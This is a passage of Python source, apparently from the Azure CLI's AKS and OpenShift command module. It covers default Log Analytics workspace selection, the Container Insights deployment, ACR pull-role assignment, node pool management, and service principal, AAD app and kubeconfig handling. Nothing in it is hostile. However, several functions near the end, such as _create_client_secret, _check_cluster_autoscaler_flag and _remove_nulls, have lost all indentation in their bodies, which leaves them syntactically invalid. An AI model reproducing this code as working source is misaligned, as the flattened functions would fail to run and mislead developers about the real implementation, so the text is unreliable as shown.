        logger.debug(err)
        logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
        return False
    return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
    """Ensure the extension is installed (installing on demand); optionally update it."""
    from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
    try:
        get_extension(extension_name)
        # Already installed; update in place when requested.
        return _update_dev_spaces_extension(cmd, extension_name, extension_module) if update else True
    except ExtensionNotInstalledException:
        return _install_dev_spaces_extension(cmd, extension_name)
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource ID of the subscription's default Log Analytics workspace.

    Picks a workspace region from the resource group's location (per-cloud
    mapping tables below), then returns the existing
    DefaultWorkspace-<sub>-<code> workspace or creates it (and its
    DefaultResourceGroup-<code>) when absent.
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "southcentralus",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "eastus",
        "northeurope": "northeurope",
        "southafricanorth": "westeurope",
        "southafricawest": "westeurope",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "uksouth",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2"
    }
    # mapping for azure china cloud
    # currently log analytics supported only China East 2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }
    # mapping for azure us government cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia"
    }
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name
    workspace_region = "eastus"
    workspace_region_code = "EUS"
    # sanity check that locations and clouds match.
    if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    # Resolve the workspace region/code for the active cloud; unknown clouds fall
    # back to using the resource group's own location.
    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
    else:
        workspace_region = rg_location
        workspace_region_code = rg_location.upper()
    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 means the RG exists but the workspace does not — fall through and create it.
            if ex.status_code != 404:
                raise ex
    else:
        resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
    default_workspace_params = {
        'location': workspace_region,
        'properties': {
            'sku': {
                'name': 'standalone'
            }
        }
    }
    async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                    default_workspace_params)
    # Poll the LRO in 15-second waits until the workspace creation completes.
    ws_resource_id = ''
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break
    return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Deploy the ContainerInsights solution onto the monitoring addon's workspace.

    Reads the workspace resource ID from ``addon.config``, normalizes it, then
    runs an ARM deployment (in the workspace's own subscription/resource group)
    that installs the Microsoft.OperationsManagement ContainerInsights solution.
    """
    # Workaround for this addon key which has been seen lowercased in the wild.
    if 'loganalyticsworkspaceresourceid' in addon.config:
        addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
    workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
    workspace_resource_id = workspace_resource_id.strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError('Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex
    # Millisecond timestamp makes each deployment name unique.
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }
    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }
    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,
                    detach=False):
    """Grant (or, with detach=True, revoke) the cluster identity's pull access to an ACR.

    ``acr_name_or_id`` may be a full ACR resource ID or a bare registry name;
    a bare name is resolved across all resource groups of the subscription.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    if is_valid_resource_id(acr_name_or_id):
        # Resource-ID path: look the registry up in its own subscription.
        try:
            parsed = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed['subscription'])
            registry = acr_client.registries.get(parsed['resource_group'], parsed['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        # Bare-name path: resolve the registry by name across all resource groups.
        try:
            registry = get_resource_by_name(cli_ctx, acr_name_or_id, 'Microsoft.ContainerRegistry/registries')
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(acr_name_or_id))
            raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Fetch a single agent pool of the given managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
    """List every agent pool of the given managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
                      kubernetes_version=None,
                      zones=None,
                      enable_node_public_ip=False,
                      node_vm_size=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      tags=None,
                      labels=None,
                      mode="User",
                      no_wait=False):
    """Add a new agent (node) pool to an existing managed cluster.

    Builds an AgentPool model from the CLI arguments and submits a
    create_or_update request.

    :raises CLIError: if a pool with the same name already exists.
    """
    # Reject duplicate pool names up front with a friendlier message than the RP's.
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    # Split the comma-separated taint list into individual taint strings.
    taints_array = []
    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            # NOTE(review): str.strip() never raises ValueError, so this
            # except branch is effectively dead code — confirm whether a
            # real taint-format validation was intended here.
            except ValueError:
                raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
    # Pick a sensible default VM size per OS when none was requested.
    if node_vm_size is None:
        if os_type.lower() == "windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"
    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,  # 0 -> None: let the service choose
        orchestrator_version=kubernetes_version,
        availability_zones=zones,
        scale_set_priority=priority,
        enable_node_public_ip=enable_node_public_ip,
        node_taints=taints_array,
        mode=mode
    )
    # Spot pools additionally carry an eviction policy and a max price.
    # NaN (unset on the CLI) is mapped to -1 — presumably the service's
    # "no explicit cap" sentinel; confirm against the RP documentation.
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price
    # Validates min/max counts and flips enable_auto_scaling when requested.
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Manually scale an agent pool to a new node count."""
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    desired_count = int(node_count)
    # Manual scaling conflicts with an active cluster autoscaler.
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if desired_count == instance.count:
        raise CLIError("The new node count is the same as the current node count.")
    instance.count = desired_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          node_image_only=False,
                          no_wait=False):
    """Upgrade an agent pool, either to a new Kubernetes version or to the
    latest node image only.

    :param kubernetes_version: Target Kubernetes version; mutually exclusive
        with node_image_only.
    :param node_image_only: When True, only the node image is upgraded.
    :raises CLIError: if both a version and --node-image-only were given.
    """
    if kubernetes_version != '' and node_image_only:
        # Fixed message: the two literals previously joined without a space
        # and rendered as "...version.If you only want...".
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
    if node_image_only:
        # Node-image upgrades go through the managed-clusters client.
        managed_cluster_client = cf_managed_clusters(cmd.cli_ctx)
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      managed_cluster_client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         tags=None,
                         mode=None,
                         no_wait=False):
    """Update an agent pool: enable/disable/retune the cluster autoscaler,
    and/or change the pool's tags or mode.

    At most one of the three autoscaler flags may be set, and at least one
    of the autoscaler flags, --tags or --mode must be provided.

    :raises CLIError: on conflicting/missing flags or invalid min/max counts.
    """
    # Booleans sum to the number of autoscaler flags that were passed.
    update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
    if update_autoscaler > 1:
        raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler"')
    if (update_autoscaler == 0 and not tags and not mode):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode"')
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    # min/max are mandatory for enable/update, and must satisfy min <= max.
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # Already on: warn instead of failing, and change nothing.
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            # Already off: warn and change nothing.
            logger.warning('Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None
    # NOTE(review): tags are assigned unconditionally, so a tags-less
    # autoscaler-only update clears existing tags — confirm intended.
    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete an agent pool, failing fast when no pool with that name exists."""
    # Case-insensitive existence check against the cluster's current pools.
    existing_names = (profile.name.lower() for profile in client.list(resource_group_name, cluster_name))
    if nodepool_name.lower() not in existing_names:
        raise CLIError("Node pool {} doesnt exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Return the upgrade profile for a single agent pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Create — or, with detach=True, delete — the 'acrpull' role assignment
    for the given client on the given registry scope.

    :raises CLIError: when the role assignment cannot be created/deleted.
    """
    if detach:
        deleted = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not deleted:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return
    created = _add_role_assignment(cli_ctx,
                                   'acrpull',
                                   client_id,
                                   scope=registry_id)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
    return
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  location=None,
                                  name=None):
    """Return service-principal credentials for an AKS cluster, creating a
    new SP (and secret) when none was supplied.

    :return: dict with 'client_secret', 'service_principal' and
        'aad_session_key' (the session key is None unless an SP was created here).
    :raises CLIError: if SP creation fails, or --service-principal was given
        without --client-secret.
    """
    aad_session_key = None
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, make one.
        if not client_secret:
            client_secret = _create_client_secret()
        # Random salt keeps the SP's identifier URL unique per invocation.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
        service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # We don't need to add role assignment for this created SPN
    else:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError('--client-secret is required if --service-principal is specified')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
        'aad_session_key': aad_session_key,
    }
def _ensure_osa_aad(cli_ctx,
                    aad_client_app_id=None,
                    aad_client_app_secret=None,
                    aad_tenant_id=None,
                    identifier=None,
                    name=None, create=False,
                    customer_admin_group_id=None):
    """Create or update the AAD application backing an OpenShift (OSA)
    cluster and return its identity-provider description.

    When create=True the AAD app is created — or updated in place if an app
    with the same identifier URI already exists. When a tenant id is not
    supplied it is resolved from the current login.

    :return: OpenShiftManagedClusterAADIdentityProvider describing the app.
    """
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if create:
        # This reply_url is temporary set since Azure need one to create the AAD.
        app_id_name = 'https://{}'.format(name)
        if not aad_client_app_secret:
            aad_client_app_secret = _create_client_secret()
        # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
        resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
                                         additional_properties=None, type="Scope")
        # Read directory permissions on Windows Azure Active Directory API
        directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
                                          additional_properties=None, type="Role")
        required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
                                                         additional_properties=None,
                                                         resource_app_id="00000002-0000-0000-c000-000000000000")
        # Look up an existing app by its identifier URI.
        list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
                                                               .format(app_id_name)))
        if list_aad_filtered:
            aad_client_app_id = list_aad_filtered[0].app_id
            # Updating reply_url with the correct FQDN information returned by the RP
            reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
            update_application(client=rbac_client.applications,
                               object_id=list_aad_filtered[0].object_id,
                               display_name=name,
                               identifier_uris=[app_id_name],
                               reply_urls=[reply_url],
                               homepage=app_id_name,
                               password=aad_client_app_secret,
                               required_resource_accesses=[required_osa_aad_access])
            logger.info('Updated AAD: %s', aad_client_app_id)
        else:
            result, _aad_session_key = create_application(client=rbac_client.applications,
                                                          display_name=name,
                                                          identifier_uris=[app_id_name],
                                                          homepage=app_id_name,
                                                          password=aad_client_app_secret,
                                                          required_resource_accesses=[required_osa_aad_access])
            aad_client_app_id = result.app_id
            logger.info('Created an AAD: %s', aad_client_app_id)
    # Get the TenantID
    if aad_tenant_id is None:
        profile = Profile(cli_ctx=cli_ctx)
        _, _, aad_tenant_id = profile.get_login_credentials()
    return OpenShiftManagedClusterAADIdentityProvider(
        client_id=aad_client_app_id,
        secret=aad_client_app_secret,
        tenant_id=aad_tenant_id,
        kind='AADIdentityProvider',
        customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
                              service_principal=None,
                              client_secret=None,
                              subscription_id=None,
                              dns_name_prefix=None,
                              location=None,
                              name=None):
    """Return service-principal credentials, creating a new SP with the
    'Contributor' role when none was supplied.

    Unlike _ensure_aks_service_principal, this adds a subscription-level
    role assignment for the newly created SP and does not return a session key.

    :return: dict with 'client_secret' and 'service_principal'.
    :raises CLIError: if SP creation fails, or --service-principal was given
        without --client-secret.
    """
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, make one.
        if not client_secret:
            client_secret = _create_client_secret()
        # Random salt keeps the SP's identifier URL unique per invocation.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
        service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # add role first before save it
        if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
            # Best-effort: warn rather than fail when the role cannot be added.
            logger.warning('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
    else:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError('--client-secret is required if --service-principal is specified')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
    }
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location of a resource group.

    The GET both validates existence (erroring if the group is missing)
    and yields the location.
    """
    groups_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    return groups_client.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".

    :param path: Destination kubeconfig path, or "-" for stdout.
    :param kubeconfig: The kubeconfig content to merge in.
    :param overwrite_existing: Forwarded to merge_kubernetes_configurations.
    :param context_name: Forwarded to merge_kubernetes_configurations.
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # Tolerate a concurrent creator; re-raise anything else.
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # Create with owner-only permissions since the file holds credentials.
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        # Write the incoming config to a temp file so the merge helper can read it.
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        # Best-effort merge: log and continue rather than fail the command.
        logger.warning('Failed to merge credentials to kube config file: %s', ex)
    finally:
        additional_file.close()
        os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
